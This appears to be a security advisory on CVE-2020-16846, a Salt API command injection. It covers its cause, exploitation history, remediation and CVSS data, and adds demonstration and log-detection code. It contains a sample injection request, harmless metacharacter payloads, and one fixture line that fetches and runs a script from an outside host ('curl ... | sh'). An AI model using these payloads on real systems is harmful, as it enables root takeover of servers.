CVE-2020-16846 — SaltStack Salt Shell Injection Vulnerability

SaltStack Salt — Unauthenticated RCE via Salt API SSH Client

What is SaltStack Salt?

SaltStack Salt (now maintained as the Salt Project under VMware / Broadcom) is an open-source infrastructure automation and configuration management framework. It enables administrators to manage thousands of servers simultaneously — running commands, distributing configuration, deploying software, and orchestrating workflows across data centers and cloud environments.

Salt exposes its functionality over HTTP/HTTPS via the Salt API (rest_cherrypy), making it accessible to automation tooling and scripts. The API also supports a salt-ssh client mode that drives remote systems over SSH rather than requiring the Salt minion daemon to be installed. This SSH client mode is the source of CVE-2020-16846.

Overview

CVE-2020-16846 is a critical (CVSS 9.8) OS command injection vulnerability (CWE-78) in the SSH client exposed through the Salt API. An attacker with network access to the Salt API can execute arbitrary shell commands on the Salt master, the central control server, by placing shell metacharacters in parameters passed to the /run endpoint with client=ssh. Because salt-api and salt-master normally run as root, the injected commands run as root.

On its own the endpoint expects external-auth (eauth) credentials, but the companion CVE-2020-25592 (improper validation of eauth credentials and tokens in salt-netapi, which lets a caller invoke the SSH client without valid credentials) removes that requirement, so the two chain into pre-authenticated remote root in a single HTTP request. Rapid7 reported achieving full pre-auth remote root in under 15 minutes.

Patches were released on November 3, 2020. Active exploitation followed within weeks: the Sysrv-hello cryptomining botnet used this vulnerability to compromise Linux and Windows servers and deploy the XMRig Monero miner.

Affected Versions

Branch Vulnerable Fixed
3002 ≤ 3002 3002.1
3001 ≤ 3001.1 3001.2
3000 ≤ 3000.3 3000.4

All earlier branches (2019.2.x and older) are also affected.

Technical Details

The vulnerability lies in how the Salt API hands user-supplied parameters to the salt-ssh code running on the master. When /run is called with client=ssh, several request fields (ssh_priv, tgt, ssh_options, ssh_port, ssh_remote_port_forwards) are formatted directly into command strings without sanitization: ssh_priv becomes the -f path of an ssh-keygen call when the named key file does not yet exist, and the others become part of the ssh command line.

Those strings were executed with shell=True (subprocess.call for the ssh-keygen invocation, subprocess.Popen for the ssh command), which passes the assembled string to /bin/sh. Shell metacharacters in any of these fields (semicolons, pipes, backticks, $() substitution) are therefore interpreted by the shell, giving arbitrary command execution in the context of the Salt API process.

POST /run HTTP/1.1
Content-Type: application/json

{
  "client": "ssh",
  "tgt": "target",
  "fun": "test.ping",
  "ssh_port": "22;id>/tmp/pwn",
  "eauth": "auto",
  "username": "...",
  "password": "..."
}

The fix stops handing strings to a shell: ssh-keygen is invoked with an argument list (subprocess.call([...]) without shell=True) and the ssh command line is split into an argument vector before it is executed, so metacharacters reach the programs as literal argument text and are never interpreted by /bin/sh.
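The vulnerable and fixed patterns side by side, as an added example that is not Salt's own code: the gen_key_* functions below stand in for Salt's ssh-keygen helper (echo replaces ssh-keygen so the example runs anywhere and simply reports the arguments the program received), the payloads are constructed to cover each metacharacter class named above, and validate_ssh_params is a hypothetical allow-list check for the API boundary, not a Salt API feature.

```python
import re
import shlex
import subprocess

# Added example, not Salt's code. The two gen_key_* functions stand in for
# Salt's ssh-keygen helper, which formatted the user-supplied ssh_priv path
# into a command string. `echo` replaces ssh-keygen so the example runs
# anywhere and simply reports the arguments the program actually received.


def gen_key_vulnerable(priv_path: str) -> str:
    """The CVE-2020-16846 pattern: format an untrusted value into a string
    and hand the string to /bin/sh via shell=True."""
    cmd = "echo keygen -q -f {}".format(priv_path)
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def gen_key_fixed(priv_path: str) -> str:
    """The shape of the fix: an argument vector and no shell. The path reaches
    the program as a single literal argv entry, metacharacters included."""
    argv = ["echo", "keygen", "-q", "-f", priv_path]
    return subprocess.run(argv, capture_output=True, text=True).stdout


def gen_key_quoted(priv_path: str) -> str:
    """Fallback when a shell is unavoidable (pipes, redirections): quote every
    untrusted value with shlex.quote so the shell sees exactly one word."""
    cmd = "echo keygen -q -f {}".format(shlex.quote(priv_path))
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


# Constructed payloads, one per metacharacter class the text lists.
PAYLOADS = [
    "/tmp/key; echo INJECTED",    # command separator
    "/tmp/key | echo INJECTED",   # pipe
    "/tmp/key`echo INJECTED`",    # backtick substitution
    "/tmp/key$(echo INJECTED)",   # $() substitution
]


def expected_literal(priv_path: str) -> str:
    """What a correct implementation prints: the path verbatim, nothing run."""
    return "keygen -q -f {}\n".format(priv_path)


def demo() -> dict:
    """Map each payload to (shell=True output, argv-form output)."""
    return {p: (gen_key_vulnerable(p), gen_key_fixed(p)) for p in PAYLOADS}


# Defence in depth at the API boundary (hypothetical validator, not Salt's):
# ssh_priv must look like a plain path and ssh_port like a port number, so a
# request such as the one shown above is rejected before anything executes.
_PATH_OK = re.compile(r"^[A-Za-z0-9_./-]+$")


def validate_ssh_params(lowstate: dict) -> list:
    """Return the names of ssh-related fields that fail the allow-list."""
    bad = []
    if "ssh_priv" in lowstate and not _PATH_OK.match(str(lowstate["ssh_priv"])):
        bad.append("ssh_priv")
    if "ssh_port" in lowstate and not str(lowstate["ssh_port"]).isdigit():
        bad.append("ssh_port")
    return bad


if __name__ == "__main__":
    for payload, (vuln, fixed) in demo().items():
        print("payload:", payload)
        print("  shell=True ->", repr(vuln))
        print("  argv form  ->", repr(fixed))
```

Run it and compare the two columns: with shell=True every payload causes INJECTED to be produced by a second command, while the argv form (and the shlex.quote fallback) prints the payload back as one literal string. The allow-list is the cheap second layer: even with the argv fix in place, a path like "x; id" has no business in an ssh_priv field.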

CVE-2020-25592 (auth bypass): salt-netapi, the layer behind the Salt API, did not properly validate eauth credentials or tokens before dispatching to the SSH client, so a request carrying bogus credentials was executed anyway; this is why the request above needs no valid username or password. Combined with CVE-2020-16846 the authentication requirement disappeared entirely, yielding pre-authenticated remote root on internet-exposed Salt masters.

Discovery

CVE-2020-16846 and the companion CVE-2020-17490 (weak file permissions on certificates created by the Salt TLS module) were reported by the researcher "KPC" through Trend Micro's Zero Day Initiative (ZDI), credited in ZDI advisories ZDI-20-1379 through ZDI-20-1383.

Exploitation Context

Rapid7 scanned the internet in November 2020 and found approximately 215 exposed and vulnerable Salt API instances. Exploitation began within weeks of the patch release.

The primary exploitation vehicle was the Sysrv-hello botnet (also tracked as Sysrv), first identified by Alibaba Cloud security researchers in February 2021 and active from at least December 2020. The botnet exploited CVE-2020-16846 (chained with CVE-2020-25592) to drop XMRig Monero cryptomining software on both Windows and Linux hosts. Juniper Threat Labs documented a major Sysrv activity surge in March 2021.

The attack pattern matched earlier SaltStack exploitation: CVE-2020-11651 (authentication bypass) and CVE-2020-11652 (directory traversal) in the Salt master's request server were disclosed at the end of April 2020 and exploited for cryptomining within days, in early May 2020, establishing Salt masters as a standing target for opportunistic attackers.

A Metasploit module (exploits/linux/http/saltstack_salt_api_cmd_exec) was published for CVE-2020-16846, lowering the technical bar for exploitation.

Remediation

  1. Upgrade Salt to 3002.1, 3001.2, or 3000.4 (or any later release). Both CVE-2020-16846 and CVE-2020-25592 are fixed in these releases.

  2. Restrict Salt API network access — the Salt API should never be directly internet-exposed. Place it behind a firewall or VPN and restrict access to trusted management hosts only.

  3. Remove the SSH client from the API surface if unused — if your environment manages hosts through the Salt minion daemon rather than salt-ssh, the API has no reason to reach the salt-ssh code path. Salt 3006 and later have a netapi_enable_clients master option: list only the clients you actually use and leave ssh out. The vulnerable releases have no such switch, so there the only options are upgrading or taking the API off the network.

  4. Rotate credentials — if your Salt master was internet-exposed before patching, treat all credentials, keys, and secrets accessible from the Salt master as potentially compromised.

  5. Audit for compromise — review Salt API access logs for POST /run requests from unexpected source addresses; the default access log records only the request line, so if a reverse proxy or WAF in front of the API logs request bodies, search those for client=ssh and shell metacharacters in the tgt and ssh_* fields. On the master, look for child processes spawned by the salt-api worker, new cron entries, unfamiliar keys in authorized_keys files, and cryptominer activity (sustained high CPU, xmrig or renamed miner binaries in the process list).
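A detector for the audit step above, as an added example that is not part of the page or the Salt project. It assumes a reverse proxy or WAF in front of salt-api that logs the JSON request body in a constructed "<timestamp> <src_ip> <method> <path> <body>" record format; the sample records, addresses and credentials are constructed for the example.

```python
import json
import re
from typing import List

# Added example, not part of the page or the Salt project. Assumes a proxy or
# WAF in front of salt-api that logs request bodies, since the Salt API access
# log records only the request line. Record format (constructed):
#   "<timestamp> <src_ip> <method> <path> <body>"

# Fields the text names as reaching a shell when client=ssh.
INJECTABLE = ("tgt", "ssh_priv", "ssh_options", "ssh_port", "ssh_remote_port_forwards")

# Shell metacharacters that matter in a shell=True command string. "*" is
# left out on purpose: it is a legitimate Salt target glob.
SHELL_META = re.compile(r"[;&|`$<>(){}\n]")

# Constructed sample records: a benign local call, a legitimate salt-ssh call,
# and two injection attempts in the shape of the request shown earlier.
SAMPLE_LOG = [
    '2020-11-20T03:14:07Z 198.51.100.23 POST /run {"client":"local","tgt":"*","fun":"test.ping","eauth":"pam","username":"ops","password":"redacted"}',
    '2020-11-20T03:15:42Z 198.51.100.23 POST /run {"client":"ssh","tgt":"web01","fun":"state.apply","roster":"flat","eauth":"pam","username":"ops","password":"redacted"}',
    '2020-11-20T03:16:09Z 203.0.113.77 POST /run {"client":"ssh","tgt":"x","fun":"test.ping","ssh_port":"22;curl http://203.0.113.77/x.sh|sh","eauth":"auto","username":"x","password":"x"}',
    '2020-11-20T03:16:11Z 203.0.113.77 POST /run [{"client":"ssh","tgt":"x","fun":"test.ping","roster":"x","ssh_priv":"x `id`","eauth":"auto","username":"x","password":"x"}]',
]


def parse_record(line: str) -> dict:
    """Split one record; the body is everything after the fourth space."""
    ts, src, method, path, body = line.split(" ", 4)
    return {"ts": ts, "src": src, "method": method, "path": path, "body": body}


def lowstates(body: str) -> List[dict]:
    """/run accepts one lowstate dict or a list of them; normalise to a list."""
    data = json.loads(body)
    return data if isinstance(data, list) else [data]


def analyze(line: str) -> List[dict]:
    """Return one finding per client=ssh lowstate in the record."""
    rec = parse_record(line)
    if rec["method"] != "POST" or rec["path"].split("?", 1)[0] != "/run":
        return []
    try:
        states = lowstates(rec["body"])
    except ValueError:
        return [{"severity": "info", "src": rec["src"], "ts": rec["ts"],
                 "reason": "unparseable body", "params": []}]
    findings = []
    for ls in states:
        if not isinstance(ls, dict) or ls.get("client") != "ssh":
            continue
        # Any injectable field carrying shell metacharacters is the
        # CVE-2020-16846 pattern; a clean ssh call is still worth a record
        # in environments that never use salt-ssh.
        tainted = [k for k in INJECTABLE if k in ls and SHELL_META.search(str(ls[k]))]
        findings.append({
            "severity": "high" if tainted else "info",
            "src": rec["src"],
            "ts": rec["ts"],
            "reason": ("shell metacharacters in ssh client parameters (CVE-2020-16846 pattern)"
                       if tainted else "ssh client invoked via Salt API"),
            "params": tainted,
        })
    return findings


def scan(lines) -> List[dict]:
    """Run analyze over every record and flatten the findings."""
    return [f for line in lines for f in analyze(line)]


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["severity"].upper(), f["ts"], f["src"], f["reason"], f["params"])
```

On the sample set the legitimate salt-ssh call from the management host is reported at info level only, while both requests from 203.0.113.77 are flagged high with the offending field named; pivot on the source address and timestamp to pull the master's process and cron history for the same window.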

Key Details

Property Value
CVE ID CVE-2020-16846
Vendor / Product SaltStack — Salt
NVD Published 2020-11-06
NVD Last Modified 2025-11-07
CVSS 3.1 Score 9.8
CVSS 3.1 Vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Severity CRITICAL
CWE CWE-78 (OS Command Injection)
CISA KEV Added 2021-11-03
CISA KEV Deadline 2022-05-03
Known Ransomware Use No

CVSS 3.1 Breakdown

Metric Value
Attack Vector Network
Attack Complexity Low
Privileges Required None
User Interaction None
Scope Unchanged
Confidentiality High
Integrity High
Availability High

Required Action

CISA BOD 22-01 Deadline: 2022-05-03. Apply updates per vendor instructions.

Timeline

Date Event
2020-11-03 SaltStack publishes its advisory and patched releases (3002.1, 3001.2, 3000.4)
2020-11-06 CVE-2020-16846 published on NVD
2020-12 Sysrv-hello botnet begins exploiting CVE-2020-16846, chained with CVE-2020-25592, to drop the XMRig Monero miner
2021-02 Alibaba Cloud security researchers identify and publish analysis of the Sysrv-hello campaign
2021-03 Juniper Threat Labs documents a surge in Sysrv activity; Metasploit module published
2021-11-03 Added to the CISA Known Exploited Vulnerabilities catalog
2022-05-03 CISA BOD 22-01 remediation deadline